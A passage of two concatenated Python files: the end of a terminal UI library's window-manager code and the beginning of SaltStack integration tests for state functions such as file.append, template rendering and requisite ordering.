self, where: CenteringPolicy | None = None, store: bool = True
) -> Window:
"""Center window"""
super().center(where, store)
return self
def close(self) -> None:
"""Instruct window manager to close object"""
assert self.manager is not None
self.manager.close(self)
def print(self) -> None:
"""Print without flushing"""
for i, line in enumerate(self.get_lines()):
sys.stdout.write(f"\033[{self.pos[1] + i};{self.pos[0]}H" + line)
self._has_printed = True
class WindowManager(Container):
"""A class representing a WindowManager."""
is_bindable = True
framerate = 60
"""Target framerate for rendering. Higher number means more resource usage."""
focusing_actions: list[MouseAction] = [
MouseAction.LEFT_CLICK,
MouseAction.LEFT_DRAG,
MouseAction.RIGHT_CLICK,
MouseAction.RIGHT_DRAG,
]
"""A list of MouseAction-s that, when executed over a non-focused window will focus it."""
def __init__(self, **attrs: Any) -> None:
"""Initialize object."""
super().__init__(**attrs)
self._is_paused: bool = False
self._is_running: bool = True
self._should_print: bool = False
self._windows: list[Window] = []
self._drag_target: tuple[Widget, Edge | None] | None = None # type: ignore
self._drag_offsets: tuple[int, int] = (1, 1)
self._window_cache: dict[int, list[str]] = {}
self.fps: int | None = None
self.focused: Window | None = None
self.mouse_translator: MouseTranslator | None = None
# Handle some events
terminal.subscribe(terminal.RESIZE, self.on_resize)
signal.signal(signal.SIGINT, lambda *_: self.exit())
# Set global styles
markup.alias("wm-title", "210 bold")
markup.alias("wm-section", "157")
boxes.DOUBLE_TOP.set_chars_of(Window)
@staticmethod
def _sleep(duration: float) -> None:
"""Accurately sleeps some duration.
Args:
duration: The amount to sleep.
"""
# TODO: Implement a better sleep function
return time.sleep(duration)
@property
def should_print(self) -> bool:
"""Returns whether the `WindowManager` has dirty elements.
An element being "dirty" means it has changes not yet shown. Windows
can set themselves to be dirty using the `Window.is_dirty` flag."""
return (
animator.is_active
or self._should_print
or any(window.is_dirty for window in self._windows)
)
def __enter__(self) -> WindowManager:
"""Starts context manager."""
return self
def __exit__(self, _: Any, exception: Exception, __: Any) -> bool:
"""Ends context manager."""
if exception is not None:
self.stop()
raise exception
return True
def _start_display_thread(self) -> None:
"""The loop that handles all displaying
This is run as a thread, with `process_input` occupying
the main line."""
def _loop() -> None:
"""Body of thread"""
last_frame = time.perf_counter()
prev_framerate = self.framerate
fps_start_time = last_frame
frametime = 1 / self.framerate
framecount = 0
while self._is_running:
if prev_framerate != self.framerate:
frametime = 1 / self.framerate
prev_framerate = self.framerate
if self._is_paused or not self.should_print:
self._sleep(frametime)
framecount += 1
continue
elapsed = time.perf_counter() - last_frame
if elapsed < frametime:
self._sleep(frametime - elapsed)
framecount += 1
continue
animator.step()
self.print()
last_frame = time.perf_counter()
if last_frame - fps_start_time >= 1:
self.fps = framecount
fps_start_time = last_frame
framecount = 0
framecount += 1
Thread(name="WM_DisplayLoop", target=_loop).start()
def nullify_cache(self, window: Window) -> None:
"""Nullifies a window's cache.
All contained windows use caching to save on performance. Cache
gets automatically nullified if a window changes while it is
focused, but not if a window changes while unfocused.
To get the correct behavior in that instance, use `Window.nullify_cache`,
which calls this method.
Args:
window: The window whos cache we will nullify.
"""
if id(window) in self._window_cache:
del self._window_cache[id(window)]
def execute_binding(self, key: Any) -> bool:
"""Execute bindings, including mouse ones.
Args:
key: The binding to execute, if found.
Returns:
Boolean describing success.
"""
if not isinstance(key, str):
return super().execute_binding(key)
# Execute universal mouse binding
if self.mouse_translator is None:
events = None
else:
events = self.mouse_translator(key)
if events is not None:
handled = False
for event in events:
if not isinstance(event, MouseEvent):
continue
bound = self._bindings.get(MouseEvent)
if bound is None:
continue
method, _ = bound
handled = method(self, event)
if handled:
return True
return super().execute_binding(key)
def handle_key(self, key: str) -> bool:
"""Process a keypress.
Args:
key: The key to handle.
Returns:
A boolean describing success.
"""
# Apply WindowManager bindings
if self.execute_binding(key):
return True
# Apply focused window binding, or send to InputField
if self.focused is not None:
if self.focused.execute_binding(key):
return True
if self.focused.handle_key(key):
return True
return False
def process_mouse(self, key: str) -> None:
"""Processes (potential) mouse input.
Args:
key: Input to handle.
"""
handlers = {
MouseAction.LEFT_CLICK: self._click,
MouseAction.LEFT_DRAG: self._drag,
MouseAction.RELEASE: self._release,
}
translate = self.mouse_translator
event_list = None if translate is None else translate(key)
if event_list is None:
return
for event in event_list:
# Ignore null-events
if event is None:
continue
self._should_print = True
for window in self._windows:
contains_pos = window.contains(event.position)
is_target = (
self._drag_target is not None and self._drag_target[0] is window
)
if not contains_pos and not is_target:
if window.is_modal:
break
continue
if event.action in self.focusing_actions:
self.focus(window)
if window.handle_mouse(event):
break
if event.action in handlers and handlers[event.action](
event.position, window
):
break
if not contains_pos and not window.is_modal:
continue
self.execute_binding(tuple(event))
# Break on modal window
if window.is_modal or contains_pos:
break
# Unset drag_target if no windows received the input
else:
self._drag_target = None
def focus(self, window: Window) -> None:
"""Sets a window to be focused.
Args:
window: The window to focus.
"""
if self.focused is not None:
self.focused.handle_mouse(MouseEvent(MouseAction.RELEASE, (0, 0)))
for other_window in self._windows:
other_window.has_focus = False
window.has_focus = True
# Don't crash if window was removed
if not window in self._windows:
return
self._windows.remove(window)
self._windows.insert(0, window)
self.focused = window
def add(self, window: Window) -> WindowManager:
"""Adds a window to this manager.
Args:
window: The window to add.
Returns:
self.
"""
original_height = window.height
def _on_step(window: Widget) -> None:
"""Sets window's height on step, centers it."""
assert isinstance(window, Window)
window.height = original_height
if window.centered_axis is not None:
window.center()
self._windows.insert(0, window)
self._should_print = True
window.manager = self
# New windows take focus-precedence over already
# existing ones, even if they are modal.
self.focus(window)
animator.animate(
window,
"width",
startpoint=int(window.width * 0.7),
endpoint=window.width,
duration=150,
step_callback=_on_step,
)
return self
def close(self, window: Window) -> None:
"""Closes a window.
Args:
window: The window to close.
"""
old_overflow = window.overflow
old_height = window.height
def _finish(window: Widget) -> None:
"""Finish closing the window after animation."""
assert isinstance(window, Window)
self._windows.remove(window)
if window.has_focus and len(self._windows) > 0:
self.focus(self._windows[0])
window.overflow = old_overflow
window.height = old_height
# NOTE: This is supposed to work using `_should_print`, but it doesn't.
# Force print
self.print()
window.overflow = Overflow.HIDE
animator.animate(
window,
"height",
endpoint=0,
duration=150,
finish_callback=_finish,
)
def on_resize(self, size: tuple[int, int]) -> None:
"""Correctly updates window positions & prints when terminal gets resized.
Args:
size: The new terminal size.
"""
width, height = size
for window in self._windows:
newx = max(0, min(window.pos[0], width - window.width))
newy = max(0, min(window.pos[1], height - window.height + 1))
window.pos = (newx, newy)
self._should_print = True
def _click(self, pos: tuple[int, int], window: Window) -> bool:
"""Process clicking a window."""
left, top, right, bottom = window.rect
if pos[1] == top and left <= pos[0] < right:
self._drag_target = (window, Edge.TOP)
elif pos[1] == bottom - 1 and left <= pos[0] < right:
self._drag_target = (window, Edge.BOTTOM)
elif pos[0] == left and top <= pos[1] < bottom:
self._drag_target = (window, Edge.LEFT)
elif pos[0] == right - 1 and top <= pos[1] < bottom:
self._drag_target = (window, Edge.RIGHT)
else:
return False
self._drag_offsets = (
pos[0] - window.pos[0],
pos[1] - window.pos[1],
)
return True
def _drag(self, pos: tuple[int, int], window: Window) -> bool:
"""Process dragging a window"""
def _clamp_pos(index: int) -> int:
"""Clamp a value using index to address x/y & width/height"""
offset = self._drag_offsets[index]
# TODO: This -2 is a very magical number. Not good.
maximum = terminal.size[index] - ((window.width, window.height)[index] - 2)
start_margin_index = abs(index - 1)
return max(
index + terminal.margins[start_margin_index],
min(
pos[index] - offset,
maximum - terminal.margins[start_margin_index + 2],
),
)
if self._drag_target is None:
return False
target_window, edge = self._drag_target
handled = False
if window is not target_window:
return False
left, top, right, bottom = window.rect
if not window.is_static and edge is Edge.TOP:
window.pos = (
_clamp_pos(0),
_clamp_pos(1),
)
handled = True
# TODO: Why are all these arbitrary offsets needed?
elif not window.is_noresize:
if edge is Edge.RIGHT:
window.rect = (left, top, pos[0] + 1, bottom)
handled = True
elif edge is Edge.LEFT:
window.rect = (pos[0], top, right, bottom)
handled = True
elif edge is Edge.BOTTOM:
window.rect = (left, top, right, pos[1] + 1)
handled = True
# Wipe window from cache
if id(window) in self._window_cache:
del self._window_cache[id(window)]
return handled
def _release(self, _: tuple[int, int], __: Window) -> bool:
"""Process release of key"""
self._drag_target = None
# This return False so Window can handle the mouse action as well,
# as not much is done in this callback.
return False
def process_input(self) -> None:
"""Processes incoming input."""
while self._is_running:
key = getch(interrupts=False)
if key == chr(3):
self.stop()
break
if self.handle_key(key):
self._should_print = True
continue
self.process_mouse(key)
def stop(self) -> None:
"""Stops the main loop."""
self._is_running = False
def pause(self) -> None:
"""Pauses the main loop."""
self._is_paused = True
def unpause(self) -> None:
"""Pauses the main loop."""
self._is_paused = False
def exit(self) -> None:
"""Exits the program."""
self.stop()
sys.exit()
def run(self, mouse_events: list[str] | None = None) -> None:
"""Runs the main loop.
Args:
mouse_events: A list of mouse event types to listen to. See
`pytermgui.ansi_interface.report_mouse` for more information.
Defaults to `["press_hold", "hover"]`.
"""
if mouse_events is None:
mouse_events = ["press_hold", "hover"]
with alt_buffer(cursor=False, echo=False):
with mouse_handler(mouse_events, "decimal_xterm") as translate:
self.mouse_translator = translate
self._start_display_thread()
self.process_input()
def print(self) -> None:
"""Prints all windows."""
def _get_lines(window: Window) -> list[str]:
"""Get cached or live lines from a Window"""
# This optimization is really important for
# a lot of windows being rendered.
if id(window) in self._window_cache:
return self._window_cache[id(window)]
lines: list[str] = []
for line in window.get_lines():
lines.append(markup.parse("[239]" + strip_ansi(line)))
self._window_cache[id(window)] = lines
return lines
sys.stdout.write("\033[2J")
for window in reversed(self._windows):
# TODO: Why are these offsets needed?
if window.allow_fullscreen:
window.pos = terminal.origin
window.width = terminal.width + 1
window.height = terminal.height + 3
if window.has_focus or window.is_noblur:
window.print()
continue
lines = _get_lines(window)
for i, line in enumerate(lines):
move_cursor((window.pos[0], window.pos[1] + i))
sys.stdout.write(line)
sys.stdout.flush()
self._should_print = False
def show_targets(self) -> None:
"""Shows all windows' positions."""
def _show_positions(widget, color_base: int = 60) -> None:
"""Show positions of widget."""
if isinstance(widget, Container):
for i, subwidget in enumerate(widget):
_show_positions(subwidget, color_base + i)
return
if not widget.is_selectable:
return
with cursor_at(widget.pos) as pprint:
debug = widget.debug()
buff = background(" ", color_base, reset_color=False)
for i in range(min(widget.width, real_length(debug)) - 1):
buff += debug[i]
pprint(buff)
self.pause()
for widget in self._windows:
_show_positions(widget)
getch()
self.unpause()
self._should_print = True
def alert(self, *content: Any) -> None:
"""Create a modal window with content.
Args:
*content: The content to add to the new window.
"""
window = Window("[wm-title]Alert!", is_modal=True, width=50)
for item in content:
window += item
window += ""
window += ["Dismiss", lambda *_: window.close()]
window.select(0)
self.add(window.center())
self.focus(window)
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
_reline(destpath)
destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
_reline(destpath)
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_show_states(self):
'''
state.show_states
'''
states = self.run_function('state.show_states')
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
states = self.run_function('state.show_states', sorted=False)
self.assertTrue(isinstance(states, list))
self.assertTrue(isinstance(states[0], six.string_types))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
# Delete if exiting
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
Ensure theses errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
])
def test_requisites_mixed_require_prereq_use(self):
'''
Call sls file containing several requisites.
'''
expected_simple_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 2,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True}
}
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo B third" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo C second" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True}
}
expected_req_use_result = {
'cmd_|-A_|-echo A_|-run': {
'__run_num__': 1,
'comment': 'Command "echo A" run',
'result': True,
'changes': True},
'cmd_|-B_|-echo B_|-run': {
'__run_num__': 4,
'comment': 'Command "echo B" run',
'result': True,
'changes': True},
'cmd_|-C_|-echo C_|-run': {
'__run_num__': 0,
'comment': 'Command "echo C" run',
'result': True,
'changes': True},
'cmd_|-D_|-echo D_|-run': {
'__run_num__': 5,
'comment': 'Command "echo D" run',
'result': True,
'changes': True},
'cmd_|-E_|-echo E_|-run': {
'__run_num__': 2,
'comment': 'Command "echo E" run',
'result': True,
'changes': True},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 3,
'comment': 'Command "echo F" run',
'result': True,
'changes': True}
}
ret = self.run_function('state.sls', mods='requisites.mixed_simple')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_simple_result, result)
# test Traceback recursion prereq+require #8785
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error2')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v2
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error3')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# test Infinite recursion prereq+require #8785 v3
# TODO: this is actually failing badly, and expected result is maybe not a recursion
#ret = self.run_function('state.sls', mods='requisites.prereq_require_recursion_error4')
#self.assertEqual(
# ret,
# ['A recursive requisite was found, SLS "requisites.prereq_require_recursion_error2" ID "B" ID "A"']
#)
# undetected infinite loopS prevents this test from running...
# TODO: this is actually failing badly
#ret = self.run_function('state.sls', mods='requisites.mixed_complex1')
#result = self.normalize_ret(ret)
#self.assertEqual(expected_result, result)
def test_watch_in(self):
'''
test watch_in requisite when there is a success
'''
ret = self.run_function('state.sls', mods='requisites.watch_in')
changes = 'test_|-return_changes_|-return_changes_|-succeed_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(ret[changes]['__run_num__'], 0)
self.assertEqual(ret[watch]['__run_num__'], 2)
self.assertEqual('Watch statement fired.', ret[watch]['comment'])
self.assertEqual('Something pretended to change',
ret[changes]['changes']['testing']['new'])
def test_watch_in_failure(self):
'''
test watch_in requisite when there is a failure
'''
ret = self.run_function('state.sls', mods='requisites.watch_in_failure')
fail = 'test_|-return_changes_|-return_changes_|-fail_with_changes'
watch = 'test_|-watch_states_|-watch_states_|-succeed_without_changes'
self.assertEqual(False, ret[fail]['result'])
self.assertEqual('One or more requisite failed: requisites.watch_in_failure.return_changes',
ret[watch]['comment'])
def normalize_ret(self, ret):
'''
Normalize the return to the format that we'll use for result checking
'''
result = {}
for item, descr in six.iteritems(ret):
result[item] = {
'__run_num__': descr['__run_num__'],
'comment': descr['comment'],
'result': descr['result'],
'changes': descr['changes'] != {} # whether there where any changes
}
return result
def test_requisites_require_ordering_and_errors(self):
'''
Call sls file containing several require_in and require.
Ensure that some of them are failing and that the order is right.
'''
expected_result = {
'cmd_|-A_|-echo A fifth_|-run': {
'__run_num__': 4,
'comment': 'Command "echo A fifth" run',
'result': True,
'changes': True,
},
'cmd_|-B_|-echo B second_|-run': {
'__run_num__': 1,
'comment': 'Command "echo B second" run',
'result': True,
'changes': True,
},
'cmd_|-C_|-echo C third_|-run': {
'__run_num__': 2,
'comment': 'Command "echo C third" run',
'result': True,
'changes': True,
},
'cmd_|-D_|-echo D first_|-run': {
'__run_num__': 0,
'comment': 'Command "echo D first" run',
'result': True,
'changes': True,
},
'cmd_|-E_|-echo E fourth_|-run': {
'__run_num__': 3,
'comment': 'Command "echo E fourth" run',
'result': True,
'changes': True,
},
'cmd_|-F_|-echo F_|-run': {
'__run_num__': 5,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' foobar: A\n',
'result': False,
'changes': False,
},
'cmd_|-G_|-echo G_|-run': {
'__run_num__': 6,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
},
'cmd_|-H_|-echo H_|-run': {
'__run_num__': 7,
'comment': 'The following requisites were not found:\n'
+ ' require:\n'
+ ' cmd: Z\n',
'result': False,
'changes': False,
}
}
ret = self.run_function('state.sls', mods='requisites.require')
result = self.normalize_ret(ret)
self.assertReturnNonEmptySaltType(ret)
self.assertEqual(expected_result, result)
ret = self.run_function('state.sls', mods='requisites.require_error1')
self.assertEqual(ret, [
"Cannot extend ID 'W' in 'base:requisites.require_error1'. It is not part of the high state.\nThis is likely due to a missing include statement or an incorrectly typed ID.\nEnsure that a state with an ID of 'W' is available\nin environment 'base' and to SLS 'requisites.require_error1'"
])
# issue #8235
# FIXME: Why is require enforcing list syntax while require_in does not?
# And why preventing it?
# Currently this state fails, should return C/B/A
result = {}
ret = self.run_function('state.sls', mods='requisites.require_simple_nolist')
self.assertEqual(ret, [
'The require statement in state \'B\' in SLS '
+ '\'requisites.require_simple_nolist\' needs to be formed as a list'
])
# commented until a fix is made for issue #8772
# TODO: this test actually fails
#ret = self.run_function('state.sls', mods='requisites.require_error2')
#self.assertEqual(ret, [
